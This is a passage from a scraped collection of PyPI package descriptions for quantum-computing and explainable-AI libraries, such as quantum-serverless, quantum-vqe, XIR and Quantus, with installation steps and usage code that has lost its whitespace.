FeaturesInfuturereleases,QuantumSecurityaimstoprovideadditionaldynamicfunctionsrelatedtoquantumcryptographyandpost-quantumcryptography.Thesefunctionswillempowerdeveloperstostreamlinetheirsecurityimplementationswithoutwritingextensivecode."} +{"package": "quantumseeding", "pacakge-description": "QuantumSeedingGenerate really random seeds with Quantum ComputersInstallationpipinstallquantumseedingUsagefromquantumseedingimportQuantumSeedingseed=QuantumSeeding(ibm_token=\"YOUR_IBM_TOKEN\"# https://quantum-computing.ibm.com/accountmax_qubits=7,# Max qubits to useverbose=True,# Print progresssimulation=True,# Use quantum computer simulator).get_seed()print(seed)"} +{"package": "quantum-serverless", "pacakge-description": "Quantum Serverless clientInstallationpipinstallquantum_serverlessDocumentationFull docs can be found athttps://qiskit-extensions.github.io/quantum-serverless/UsageStep 1: write patternfromquantum_serverlessimportdistribute_task,get,get_arguments,save_resultfromqiskitimportQuantumCircuitfromqiskit.circuit.randomimportrandom_circuitfromqiskit.primitivesimportSamplerfromqiskit.quantum_infoimportSparsePauliOp# 1. let's annotate out function to convert it# to distributed async function# using `distribute_task` decorator@distribute_task()defdistributed_sample(circuit:QuantumCircuit):\"\"\"Calculates quasi dists as a distributed function.\"\"\"returnSampler().run(circuit).result().quasi_dists[0]# 2. our program will have one arguments# `circuits` which will store list of circuits# we want to sample in parallel.# Let's use `get_arguments` funciton# to access all program argumentsarguments=get_arguments()circuits=arguments.get(\"circuits\",[])# 3. run our functions in a loop# and get execution references backfunction_references=[distributed_sample(circuit)forcircuitincircuits]# 4. `get` function will collect all# results from distributed functionscollected_results=get(function_references)# 5. `save_result` will save results of program execution# so we can access it latersave_result({\"quasi_dists\":collected_results})Step 2: run patternfromquantum_serverlessimportServerlessProvider,QiskitPatternfromqiskit.circuit.randomimportrandom_circuitserverless=ServerlessProvider(username=\"\",password=\"\",host=\"\",)# create programprogram=QiskitPattern(title=\"Quickstart\",entrypoint=\"pattern.py\",working_dir=\"./src\")# create inputs to our programcircuits=[]for_inrange(3):circuit=random_circuit(3,2)circuit.measure_all()circuits.append(circuit)# run programjob=serverless.run(program=program,arguments={\"circuits\":circuits})Step 3: monitor job statusjob.status()# 'DONE'# or get logsjob.logs()Step 4: get resultsjob.result()# {\"quasi_dists\": [# {\"0\": 0.25, \"1\": 0.25, \"2\": 0.2499999999999999, \"3\": 0.2499999999999999},# {\"0\": 0.1512273969460124, \"1\": 0.0400459556274728, \"6\": 0.1693190975212014, \"7\": 0.6394075499053132},# {\"0\": 0.25, \"1\": 0.25, \"4\": 0.2499999999999999, \"5\": 0.2499999999999999}# ]}"} +{"package": "quantum-sg", "pacakge-description": "quantum-sgA command line tool that generates a cryptographically secure quantum-level secrets using ANU QRNG.UsageThis function generates a random set of secrets using the quantumrandom library. The parameters population, number and length are optional.fromstringimportdigitsfromquantum_sgimportrandrand(length=24,number=2,population=digits)Usage as CLI$pipinstallquantum-sg\n$quantum-sg-l24-n2>4HOpcSlzrP1JA5pFROUJLi7V\n>FkEKjlgm08Ey17HrAeeKKRl4OptionsThis command line utility can be used to generate secure secrets of specified length and complexity.The-hor--helpflag will display a help message to the user with instructions on how to use the utility.The-nor--numberflag will allow the user to specify the number of secrets to generate. By default, the utility will generate one secret.The-lor--lengthflag will allow the user to specify the length of each generated secret. By default, this length is 24 characters.The-wd,--digits,-wl,--lowercase,-wu,--uppercase,-wpand--punctuationflags will allow the user to specify which types of characters should be included in the generated secrets. By default, digits, lowercase characters, and uppercase characters are included.LicenseThe MIT License (MIT)Copyright (c) 2023 Alexander ShelepenokPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "quantumsim", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-simba", "pacakge-description": "SImBA - Systematic Inference of Bosonic quAntum systems>>Documentation< setup.py"} +{"package": "quantum-tree", "pacakge-description": "This Python package implements quantum decision tree classifiers for binary data. The details of the method can be found inRepresentation of binary classification trees with binary features by quantum circuits.InstallationInstall viapipor clone this repository. In order to usepip, type:$pipinstallquantum-tree\ud83c\udf33UsageMinimal working example:# create quantum tree instancefromqtree.qtreeimportQTreeqtree=QTree(max_depth=1)# create simple training dataimportnumpyasnpX=np.array([[1,0,0],[0,1,0],[0,0,1]])# featuresy=np.array([[0,0],[0,1],[1,1]])# labels# fit quantum treeqtree.fit(X,y)# make quantum tree predictionqtree.predict([[0,0,1]])DocumentationDocumentation is available onhttps://qtree.readthedocs.io/en/latest.Demo notebooks can be found in theexamples/directory.\ud83d\udcd6CitationIf you find this code useful in your research, please consider citingRepresentation of binary classification trees with binary features by quantum circuits:@article{Heese2022representationof,\n doi ={10.22331/q-2022-03-30-676},\n url ={https://doi.org/10.22331/q-2022-03-30-676},\n title ={Representation of binary classification trees with binary features by quantum circuits},\n author ={Heese, Raoul and Bickert, Patricia and Niederle, Astrid Elisa},\n journal ={{Quantum}},\n issn ={2521-327X},\n publisher ={{Verein zur F{\\\"{o}}rderung des Open Access Publizierens in den Quantenwissenschaften}},\n volume ={6},\n pages ={676},\n month ={3},\n year ={2022}}This project is currently not under development and is not actively maintained."} +{"package": "quantum-tv", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-tvos", "pacakge-description": "No description available on PyPI."} +{"package": "quantumtw", "pacakge-description": "quantumtwThis project is developed by TENG-LIN YU. You can contact me by following methods:Mail:tlyu0419@gmail.comFacebook:https://www.facebook.com/tlyu0419requirementspip install requirementsquery_dateUnlike twstock packages, it requests the data by session.get() so that we don't need to sleep 5 seconds for each request.\nNotice: You can't query data by the browser while running this function, or you will be banned by the website.query Highlights of Daily Tradingquery singal stockquery Top 150 stocksquery specific stocks.trade_signalsby Machine Learning modeltimeseriesby DomainsVisualize ResultNewsYahoo marketNotificationMailIf you only want to receive the result, you can send mail to me, and then I will send mail to you daily:)AnnouncementIt's just a toy project, the prediction of the stock price is based on historical data, but in fact, many circumstances could affect the stock price.\n2610 is a bad example; another is a good example\nso the project only offers trade signals; you need to consider other information and then buy or sell your stock.Ref packagesProphetFindMindFindLab\u6a5f\u5668\u5b78\u7fd2\u65bc\u91cf\u5316\u4ea4\u6613\u7684\u6311\u6230\u8207\u89e3\u6cd5 - \u97d3\u627f\u4f51 | MOPCON 2019How to label trade signalsvariables"} +{"package": "quantum-uwp", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-viz", "pacakge-description": "quantum-vizquantum-vizis the Python package companion ofquantum-viz.js, a JavaScript package that supports visualizing any arbitrary quantum gate, classical control logic and collapsed grouped blocks of gates using JSON-formatted input data.quantum-vizcontains a Jupyter widget and will also include support for translating quantum circuits written in common quantum programming libraries to JSON using thequantum-viz.jsJSON schema.InstallationYou can install thequantum-viz.js widgetviapipfrom PyPI:pipinstallquantum-vizExampleTo use the quantum-viz widget, run the below example code in aJupyter notebookcell:fromquantum_vizimportViewer# Create a quantum circuit that prepares a Bell statecircuit={\"qubits\":[{\"id\":0},{\"id\":1,\"numChildren\":1}],\"operations\":[{\"gate\":'H',\"targets\":[{\"qId\":0}],},{\"gate\":'X',\"isControlled\":\"True\",\"controls\":[{\"qId\":0}],\"targets\":[{\"qId\":1}],},{\"gate\":'Measure',\"isMeasurement\":\"True\",\"controls\":[{\"qId\":1}],\"targets\":[{\"type\":1,\"qId\":1,\"cId\":0}],},],}widget=Viewer(circuit)widget# Display the widgetQiskit IntegrationBy installing the optional[qiskit]dependency, you can leverage Qiskit'sQuantumCircuitAPIs\nto define the circuit and render it using theViewerwidget on Jupyter, for example:fromqiskitimportQuantumRegister,ClassicalRegister,QuantumCircuitfromquantum_vizimportViewerqr=QuantumRegister(3,'q')anc=QuantumRegister(1,'ancilla')cr=ClassicalRegister(3,'c')qc=QuantumCircuit(qr,anc,cr)qc.h(qr[0:3])qc.x(anc[0])qc.h(anc[0])qc.cx(qr[0:3],anc[0])qc.h(qr[0:3])qc.barrier(qr)qc.measure(qr,cr)Viewer(qc)Optionally, you can also import thedisplaymethod fromquantum_viz.utilsto render the circuit on a new browser window:fromquantum_viz.utilsimportdisplaydisplay(qc)ContributingCheck out ourcontributing guidelinesto find out how you can contribute to quantum-viz."} +{"package": "quantum-volume", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-vqe", "pacakge-description": "Quantum VQE PackageThe Quantum VQE (Variational Quantum Eigensolver) package is a Python library for simulating the VQE algorithm on quantum computers. It utilizes the Qiskit framework to create and optimize quantum circuits that estimate the ground state energy of a given Hamiltonian.FeaturesImplementation of the VQE algorithm using Qiskit.Functions to create variational ansatzes for quantum circuits.Optimization routines to find the minimum eigenvalue of the Hamiltonian.Utilities for validating input Hamiltonians.InstallationBefore installing the Quantum VQE package, ensure that you have Python 3.7 or higher and pip installed.To install the Quantum VQE package, run the following command in your terminal:pip install git+https://github.com/SweatyCrayfish/quantum_vqe.gitAlternatively, you can clone the repository and install the package locally:gitclonehttps://github.com/SweatyCrayfish/quantum_vqe.gitcdquantum_vqe\npipinstall.UsageHere is a simple example of how to use the Quantum VQE package to find the ground state energy of a Hamiltonian:fromqiskit.opflowimportX,Z,Ifromquantum_vqe.vqeimportcreate_vqe_ansatz,optimize_vqefromqiskitimportAerDefine your Hamiltonian. For example, for a simple 2-qubit system:hamiltonian=(X^X)+(Z^I)Definethequantumbackendbackend=Aer.get_backend('statevector_simulator')circuit,parameters=create_vqe_ansatz(num_qubits=2)Optimizethecircuitparametersresult=optimize_vqe(circuit,hamiltonian,backend)print(f\"Ground state energy:{result.fun}\")For more detailed examples, please refer to the examples/ directory in the repository.DevelopmentTo contribute to the Quantum VQE package, you can clone the repository and set up a development environment:gitclonehttps://github.com/SweatyCrayfish/quantum_vqe.gitcdquantum_vqe\npipinstall-e.TestingTo run the tests for the Quantum VQE package, navigate to the package root and execute:python -m unittest discover testsLicenseThis project is licensed under the MIT License - see the LICENSE file for details.AuthorsViktor Veselov - Initial workAcknowledgmentsThe Qiskit community for providing the framework to build upon.CitationIf you use this package in your research, please cite it as follows:@misc{quantum_vqe,\nauthor = {Viktor Veselov},\ntitle = {Quantum VQE: A Variational Quantum Eigensolver Package},\nyear = {2023},\npublisher = {GitHub},\njournal = {GitHub repository},\nhowpublished = {url{https://github.com/SweatyCrayfish/quantum_vqe}}}"} +{"package": "quantum-watch", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-watchos", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-web", "pacakge-description": "No description available on PyPI."} +{"package": "quantumwerewolf", "pacakge-description": "Quantum WerewolfQuantum Werewolf is a game based on the party game \"The Werewolves of Millers Hollow\" (known as \"Weerwolven van Wakkerdam\" to Dutch audiences) with a quantum mechanical twist: Players play all possible games of werewolf at the same time.Original puzzle:https://web.archive.org/web/20080719133809/http://puzzle.cisra.com.au/D-5-Schroedingers-Wolves.pdfSolution and original explanation:https://web.archive.org/web/20181116123708/https://puzzle.cisra.com.au/2008/quantumwerewolf.htmlInstallation$ pip install git+https://github.com/ProodjePindakaas/Quantum-WerewolfUsageStart the game in a terminal by running thequantum-werewolfcommand.AboutWhat is \"The Werewolves of Millers Hollow\"?The Werewolves of Millers Hollow is a classical party game where each player (save the game master) gets a secret role card assigned to them. There are two teams: the werewolves\nand the village (consisting of all roles except the werewolves). At night, each player secretly takes an action corresponding to their role -- the seer gets to see another player's card,\nCupid can make two players fall in love, and the werewolves vote on who they will eat that night. During the day, all players vote on another player to be lynched.\nThe village's goal is to kill all werewolves, and the werewolves' goal is to kill all non-werewolves. When only one faction is left, they win.What is the quantum twist?The quantum twist introduced in Quantum Werewolf is a superposition of roles. This means that every player is every role at once, and gets to take actions corresponding to all roles at night.\nOf course, the superposition can be collapsed by measurements. Currently, there are two ways of measuring the superposition:A player uses his Seer action to look at someone else's role, partially collapsing the superposition (and introducing entanglement!);A player dies, which reveals his role to all players, collapsing the superposition quite a bit.Since there is no way of knowing the final gamestate (in fact, your actions influence what the final measurement will be), it is important to players to \"crack\" the permutations\nand try to make the superposition collapse in their favour. The game is very complex, and honestly isn't much fun to play with your grandma. However, it can be used as an\neducation tool for superpositions, or as a way to pit physicists against each other in cracking the code.What are the rules?Game setupWhen you start a game of quantum werewolf, you are prompted to enter the names of all participating players first.\nAfter entering and confirming the list of players, you are presented with the standard role selection of 2 werewolves and the seer.\nYou may refuse this role selection and choose the amount of werewolves as well as the additional roles.A game of quantum werewolf needs at least 1 werewolf, optional roles are:Seer: Inspects the identity of a player each night, revealing their role to the seer.Cupid: Chooses two players to fall in love during the first night. Whenever one of the lovers dies, the other dies as well. The lovers win if they are the only 2 players left, regardless of role.Hunter: Whenever the hunter dies, they may choose to kill another player.You should also decide on the rules to follow during the day phase.Night phaseDuring the night all special roles get to take their specific actions. In quantum werewolf all players will take all their actions in turns.\nIn your turn you must specify how you would act as each role. You are only promted for actions corresponding to roles for which you have a non-zero probability to be.Day phaseAt the start of the day phase all players that have died during the night will be revealed, as will their roles.\nAfter the reveal, the players are presented with the current state of the game in which all players and their chances of being each role is tabulated.\nAll players in the table are anomymous except for dead players. The order of the players is random, but fixed throughout the game.All players that are still alive must now discuss whoever they will lynch.\nThis discussion is separate from the interface of the game.\nYou should decide beforehand on the format of this discussion and how the lynch target will be decided."} +{"package": "quantum-win32", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-windows", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-winforms", "pacakge-description": "No description available on PyPI."} +{"package": "quantumworld", "pacakge-description": "No description available on PyPI."} +{"package": "quantumworldX", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-xir", "pacakge-description": "XIRis an intermediate representation language for quantum circuits.FeaturesSimple. Easy to learn, write, and understand.Modular. Compose observables, gates, and entire XIR programs.Flexible. Declare or define your own gates and observables.InstallationXIR requires Python version 3.7 or above. Installation of XIR, as well as all\ndependencies, can be done using pip:pip install quantum-xirExamplesA curated selection of XIR scripts can be found in theExamplespage of the Sphinx documentation; however, the example below demonstrates a general overview of the syntax:// Include additional script\nuse my_declarations;\n\n// Declare custom gates\ngate RX(theta) [w1];\ngate RY(theta) [w1];\ngate RZ(theta) [w1];\ngate Toffoli [w1, w2, w3];\n\n// Declare a function\nfunc sin(x);\n\n// Declare observables\nobs X [w1]; obs Y [w1]; obs Z [w1];\n\n// Declare outputs\nout sample(shots) [0..8];\nout expval(observable) [w1, w2];\nout amplitude(state) [0..8];\n\n// Define a composite gate.\ngate R3T(theta)[a, b, c, d]:\n RX(theta: -2.3932854391951004) | [a];\n RY(theta) | [b];\n RZ(pi / sin(3 * 4 / 2 - 2)) | [c];\n Toffoli | [b, c, d];\nend;\n\n// Define an observable.\nobs XYZ [w1, w2]:\n -1.6, X[w1];\n 0.73, Y[w1] @ Z[w2];\nend;\n\n// Apply the gate twice.\nR3T(1.23) | [0, 1, 2, 3];\nR3T(theta: 3.21) | [4..8];\n\n// Compute various outputs.\nsample(shots: 1000) | [0..8];\nexpval(observable: XYZ) | [0, 3];\namplitude(state: [0, 1, 0, 1, 0, 0, 1, 1]) | [0..8];Contributing to XIRWe welcome contributions - simply fork the XIR repository, and then make apull\nrequestcontaining your\ncontribution. All contributors to XIR will be listed as authors on the releases.\nSee ourchangelogfor more details.We also encourage bug reports, suggestions for new features and enhancements,\nand even links to cool projects or applications built on XIR. Visit thecontributions\npageto learn more about sharing your ideas with the XIR team.SupportSource Code:https://github.com/XanaduAI/xirIssue Tracker:https://github.com/XanaduAI/xir/issuesIf you are having issues, please let us know by posting the issue on our GitHub issue tracker.AuthorsXIR is the work ofmany contributors.LicenseXIR isfreeandopen source, released under theApache License, Version 2.0."} +{"package": "quantum-xyz", "pacakge-description": "Quantum XYZXYZ is a Python package for quantum compilation. It provides several implementations for quantum circuit optimizations, such as exact CNOT synthesis.Read full documentationExamplepipinstallquantum-xyzcdexample\npythonsynthesize_dicke.py"} +{"package": "quantumz", "pacakge-description": "The QuantumZ package contains the set of functions to emulate quantum computations on the classical computers. The quantum states are supposed to be presented as dictionaries in the form {'|01>': 0.717, '|11>': 0.717} (for example). The same notation is used for the quantum gates.All functions are described in the source code."} +{"package": "quanturf", "pacakge-description": "No description available on PyPI."} +{"package": "quanturf-blankly", "pacakge-description": "No description available on PyPI."} +{"package": "quantus", "pacakge-description": "A toolkit to evaluate neural network explanationsPyTorch and TensorFlowQuantus is currently under active development so carefully note the Quantus release version to ensure reproducibility of your work.\ud83d\udcd1 Shortcut to paper!News and Highlights! :rocket:New metrics added:EfficientMPRTandSmoothMPRTbyHedstr\u00f6m et al., (2023)Released a new versionhereAccepted to Journal of Machine Learning Research (MLOSS), read thepaperOffers more than30+ metrics in 6 categoriesfor XAI evaluationSupports different data types (image, time-series, tabular, NLP next up!) and models (PyTorch, TensorFlow)Extended built-in support for explanation methods (captum,tf-explainandzennit)CitationIf you find this toolkit or its companion paperQuantus: An Explainable AI Toolkit for Responsible Evaluation of Neural Network Explanations and Beyondinteresting or useful in your research, use the following Bibtex annotation to cite us:@article{hedstrom2023quantus,author={Anna Hedstr{\\\"{o}}m and Leander Weber and Daniel Krakowczyk and Dilyara Bareeva and Franz Motzkus and Wojciech Samek and Sebastian Lapuschkin and Marina Marina M.{-}C. H{\\\"{o}}hne},title={Quantus: An Explainable AI Toolkit for Responsible Evaluation of Neural Network Explanations and Beyond},journal={Journal of Machine Learning Research},year={2023},volume={24},number={34},pages={1--11},url={http://jmlr.org/papers/v24/22-0142.html}}When applying the individual metrics of Quantus, please make sure to also properly cite the work of the original authors (as linked below).Table of contentsLibrary overviewInstallationGetting startedTutorialsContributingLibrary overviewA simple visual comparison of eXplainable Artificial Intelligence (XAI) methods is often not sufficient to decide which explanation method works best as shown exemplarily in Figure a) for four gradient-based methods \u2014 Saliency (M\u00f8rch et al., 1995;Baehrens et al., 2010), Integrated Gradients (Sundararajan et al., 2017), GradientShap (Lundberg and Lee, 2017) or FusionGrad (Bykov et al., 2021), yet it is a common practice for evaluation XAI methods in absence of ground truth data. Therefore, we developed Quantus, an easy-to-use yet comprehensive toolbox for quantitative evaluation of explanations \u2014 including 30+ different metrics.With Quantus, we can obtain richer insights on how the methods compare e.g., b) by holistic quantification on several evaluation criteria and c) by providing sensitivity analysis of how a single parameter e.g. the pixel replacement strategy of a faithfulness test influences the ranking of the XAI methods.MetricsThis project started with the goal of collecting existing evaluation metrics that have been introduced in the context of XAI research \u2014 to help automate the task ofXAI quantification. Along the way of implementation, it became clear that XAI metrics most often belong to one out of six categories i.e., 1) faithfulness, 2) robustness, 3) localisation 4) complexity 5) randomisation or 6) axiomatic metrics. The library contains implementations of the following evaluation metrics:Faithfulnessquantifies to what extent explanations follow the predictive behaviour of the model (asserting that more important features play a larger role in model outcomes)Faithfulness Correlation(Bhatt et al., 2020): iteratively replaces a random subset of given attributions with a baseline value and then measuring the correlation between the sum of this attribution subset and the difference in function outputFaithfulness Estimate(Alvarez-Melis et al., 2018): computes the correlation between probability drops and attribution scores on various pointsMonotonicity Metric(Arya et al. 2019): starts from a reference baseline to then incrementally replace each feature in a sorted attribution vector, measuring the effect on model performanceMonotonicity Metric(Nguyen et al, 2020): measures the spearman rank correlation between the absolute values of the attribution and the uncertainty in the probability estimationPixel Flipping(Bach et al., 2015): captures the impact of perturbing pixels in descending order according to the attributed value on the classification scoreRegion Perturbation(Samek et al., 2015): is an extension of Pixel-Flipping to flip an area rather than a single pixelSelectivity(Montavon et al., 2018): measures how quickly an evaluated prediction function starts to drop when removing features with the highest attributed valuesSensitivityN(Ancona et al., 2019): computes the correlation between the sum of the attributions and the variation in the target output while varying the fraction of the total number of features, averaged over several test samplesIROF(Rieger at el., 2020): computes the area over the curve per class for sorted mean importances of feature segments (superpixels) as they are iteratively removed (and prediction scores are collected), averaged over several test samplesInfidelity(Chih-Kuan, Yeh, et al., 2019): represents the expected mean square error between 1) a dot product of an attribution and input perturbation and 2) difference in model output after significant perturbationROAD(Rong, Leemann, et al., 2022): measures the accuracy of the model on the test set in an iterative process of removing k most important pixels, at each step k most relevant pixels (MoRF order) are replaced with noisy linear imputationsSufficiency(Dasgupta et al., 2022): measures the extent to which similar explanations have the same prediction labelRobustnessmeasures to what extent explanations are stable when subject to slight perturbations of the input, assuming that model output approximately stayed the sameLocal Lipschitz Estimate(Alvarez-Melis et al., 2018): tests the consistency in the explanation between adjacent examplesMax-Sensitivity(Yeh et al., 2019): measures the maximum sensitivity of an explanation using a Monte Carlo sampling-based approximationAvg-Sensitivity(Yeh et al., 2019): measures the average sensitivity of an explanation using a Monte Carlo sampling-based approximationContinuity(Montavon et al., 2018): captures the strongest variation in explanation of an input and its perturbed versionConsistency(Dasgupta et al., 2022): measures the probability that the inputs with the same explanation have the same prediction labelRelative Input Stability (RIS)(Agarwal, et. al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between the two inputs x and x'Relative Representation Stability (RRS)(Agarwal, et. al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between internal models representations L_x and L_x' for x and x' respectivelyRelative Output Stability (ROS)(Agarwal, et. al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between output logits h(x) and h(x') for x and x' respectivelyLocalisationtests if the explainable evidence is centred around a region of interest (RoI) which may be defined around an object by a bounding box, a segmentation mask or, a cell within a gridPointing Game(Zhang et al., 2018): checks whether attribution with the highest score is located within the targeted objectAttribution Localization(Kohlbrenner et al., 2020): measures the ratio of positive attributions within the targeted object towards the total positive attributionsTop-K Intersection(Theiner et al., 2021): computes the intersection between a ground truth mask and the binarized explanation at the top k feature locationsRelevance Rank Accuracy(Arras et al., 2021): measures the ratio of highly attributed pixels within a ground-truth mask towards the size of the ground truth maskRelevance Mass Accuracy(Arras et al., 2021): measures the ratio of positively attributed attributions inside the ground-truth mask towards the overall positive attributionsAUC(Fawcett et al., 2006): compares the ranking between attributions and a given ground-truth maskFocus(Arias et al., 2022): quantifies the precision of the explanation by creating mosaics of data instances from different classesComplexitycaptures to what extent explanations are concise i.e., that few features are used to explain a model predictionSparseness(Chalasani et al., 2020): uses the Gini Index for measuring, if only highly attributed features are truly predictive of the model outputComplexity(Bhatt et al., 2020): computes the entropy of the fractional contribution of all features to the total magnitude of the attribution individuallyEffective Complexity(Nguyen at el., 2020): measures how many attributions in absolute values are exceeding a certain thresholdRandomisationtests to what extent explanations deteriorate as inputs to the evaluation problem e.g., model parameters are increasingly randomisedMPRT (Model Parameter Randomisation Test)(Adebayo et. al., 2018): randomises the parameters of single model layers in a cascading or independent way and measures the distance of the respective explanation to the original explanationSmooth MPRT(Hedstr\u00f6m et. al., 2023): adds a \"denoising\" preprocessing step to the original MPRT, where the explanations are averaged over N noisy samples before the similarity between the original- and fully random model's explanations is measuredEfficient MPRT(Hedstr\u00f6m et. al., 2023): reinterprets MPRT by evaluating the rise in explanation complexity (discrete entropy) before and after full model randomisation, asking for increased explanation complexity post-randomisationRandom Logit Test(Sixt et al., 2020): computes for the distance between the original explanation and the explanation for a random other classAxiomaticassesses if explanations fulfil certain axiomatic propertiesCompleteness(Sundararajan et al., 2017): evaluates whether the sum of attributions is equal to the difference between the function values at the input x and baseline x' (and referred to as Summation to Delta (Shrikumar et al., 2017), Sensitivity-n (slight variation, Ancona et al., 2018) and Conservation (Montavon et al., 2018))Non-Sensitivity(Nguyen at el., 2020): measures whether the total attribution is proportional to the explainable evidence at the model outputInput Invariance(Kindermans et al., 2017): adds a shift to input, asking that attributions should not change in response (assuming the model does not)Additional metrics will be included in future releases. Pleaseopen an issueif you have a metric you believe should be apart of Quantus.Disclaimers.It is worth noting that the implementations of the metrics in this library have not been verified by the original authors. Thus any metric implementation in this library may differ from the original authors. Further, bear in mind that evaluation metrics for XAI methods are often empirical interpretations (or translations) of qualities that some researcher(s) claimed were important for explanations to fulfil, so it may be a discrepancy between what the author claims to measure by the proposed metric and what is actually measured e.g., using entropy as an operationalisation of explanation complexity. Please read theuser guidelinesfor further guidance on how to best use the library.InstallationIf you already havePyTorchorTensorFlowinstalled on your machine,\nthe most light-weight version of Quantus can be obtained fromPyPIas follows (no additional explainability functionality or deep learning framework will be included):pip install quantusAlternatively, you can simply add the desired deep learning framework (in brackets) to have the package installed together with Quantus.\nTo install Quantus with PyTorch, please run:pip install \"quantus[torch]\"For TensorFlow, please run:pip install \"quantus[tensorflow]\"Package requirementsThe package requirements are as follows:python>=3.7.0\ntorch>=1.11.0\ntensorflow>=2.5.0Please note that the exactPyTorchand/ orTensorFlowversions\nto be installed depends on your Python version (3.7-3.11) and platform (darwin,linux, \u2026).\nSee[project.optional-dependencies]section in thepyproject.tomlfile.Getting startedThe following will give a short introduction to how to get started with Quantus. Note that this example is based on thePyTorchframework, but we also supportTensorFlow, which would differ only in the loading of the model, data and explanations. To get started with Quantus, you need:A model (model), inputs (x_batch) and labels (y_batch)Some explanations you want to evaluate (a_batch)Step 1. Load data and modelLet's first load the data and model. In this example, a pre-trained LeNet available from Quantus\nfor the purpose of this tutorial is loaded, but generally, you might use any Pytorch (or TensorFlow) model instead. To follow this example, one needs to have quantus and torch installed, by e.g.,pip install 'quantus[torch]'.importquantusfromquantus.helpers.model.modelsimportLeNetimporttorchimporttorchvisionfromtorchvisionimporttransforms# Enable GPU.device=torch.device(\"cuda:0\"iftorch.cuda.is_available()else\"cpu\")# Load a pre-trained LeNet classification model (architecture at quantus/helpers/models).model=LeNet()ifdevice.type==\"cpu\":model.load_state_dict(torch.load(\"tests/assets/mnist\",map_location=torch.device('cpu')))else:model.load_state_dict(torch.load(\"tests/assets/mnist\"))# Load datasets and make loaders.test_set=torchvision.datasets.MNIST(root='./sample_data',download=True,transform=transforms.Compose([transforms.ToTensor()]))test_loader=torch.utils.data.DataLoader(test_set,batch_size=24)# Load a batch of inputs and outputs to use for XAI evaluation.x_batch,y_batch=iter(test_loader).next()x_batch,y_batch=x_batch.cpu().numpy(),y_batch.cpu().numpy()Step 2. Load explanationsWe still need some explanations to evaluate.\nFor this, there are two possibilities in Quantus. You can provide either:a set of re-computed attributions (np.ndarray)any arbitrary explanation function (callable), e.g., the built-in methodquantus.explainor your own customised functionWe show the different options below.Using pre-computed explanationsQuantus allows you to evaluate explanations that you have pre-computed,\nassuming that they match the data you provide inx_batch. Let's say you have explanations\nforSaliencyandIntegrated Gradientsalready pre-computed.In that case, you can simply load these into corresponding variablesa_batch_saliencyanda_batch_intgrad:a_batch_saliency=load(\"path/to/precomputed/saliency/explanations\")a_batch_intgrad=load(\"path/to/precomputed/intgrad/explanations\")Another option is to simply obtain the attributions using one of many XAI frameworks out there,\nsuch asCaptum,Zennit,tf.explain,\noriNNvestigate. The following code example shows how to obtain explanations (SaliencyandIntegrated Gradients, to be specific)\nusingCaptum:importcaptumfromcaptum.attrimportSaliency,IntegratedGradients# Generate Integrated Gradients attributions of the first batch of the test set.a_batch_saliency=Saliency(model).attribute(inputs=x_batch,target=y_batch,abs=True).sum(axis=1).cpu().numpy()a_batch_intgrad=IntegratedGradients(model).attribute(inputs=x_batch,target=y_batch,baselines=torch.zeros_like(x_batch)).sum(axis=1).cpu().numpy()# Save x_batch and y_batch as numpy arrays that will be used to call metric instances.x_batch,y_batch=x_batch.cpu().numpy(),y_batch.cpu().numpy()# Quick assert.assert[isinstance(obj,np.ndarray)forobjin[x_batch,y_batch,a_batch_saliency,a_batch_intgrad]]Passing an explanation functionIf you don't have a pre-computed set of explanations but rather want to pass an arbitrary explanation function\nthat you wish to evaluate with Quantus, this option exists.For this, you can for example rely on the built-inquantus.explainfunction to get started, which includes some popular explanation methods\n(please runquantus.available_methods()to see which ones). Examples of how to usequantus.explainor your own customised explanation function are included in the next section.As seen in the above image, the qualitative aspects of explanations\nmay look fairly uninterpretable --- since we lack ground truth of what the explanations\nshould be looking like, it is hard to draw conclusions about the explainable evidence. To gather quantitative evidence for the quality of the different explanation methods, we can apply Quantus.Step 3. Evaluate with QuantusQuantus implements XAI evaluation metrics from different categories,\ne.g., Faithfulness, Localisation and Robustness etc which all inherit from the basequantus.Metricclass.\nTo apply a metric to your setting (e.g.,Max-Sensitivity)\nit first needs to be instantiated:metric=quantus.MaxSensitivity(nr_samples=10,lower_bound=0.2,norm_numerator=quantus.fro_norm,norm_denominator=quantus.fro_norm,perturb_func=quantus.uniform_noise,similarity_func=quantus.difference,abs=True,normalise=True)and then applied to your model, data, and (pre-computed) explanations:scores=metric(model=model,x_batch=x_batch,y_batch=y_batch,a_batch=a_batch_saliency,device=device,explain_func=quantus.explain,explain_func_kwargs={\"method\":\"Saliency\"},)Use quantus.explainSince a re-computation of the explanations is necessary for robustness evaluation, in this example, we also pass an explanation function (explain_func) to the metric call. Here, we rely on the built-inquantus.explainfunction to recompute the explanations. The hyperparameters are set with theexplain_func_kwargsdictionary. Please find more details on how to usequantus.explainatAPI documentation.Employ customised functionsYou can alternatively use your own customised explanation function\n(assuming it returns annp.ndarrayin a shape that matches the inputx_batch). This is done as 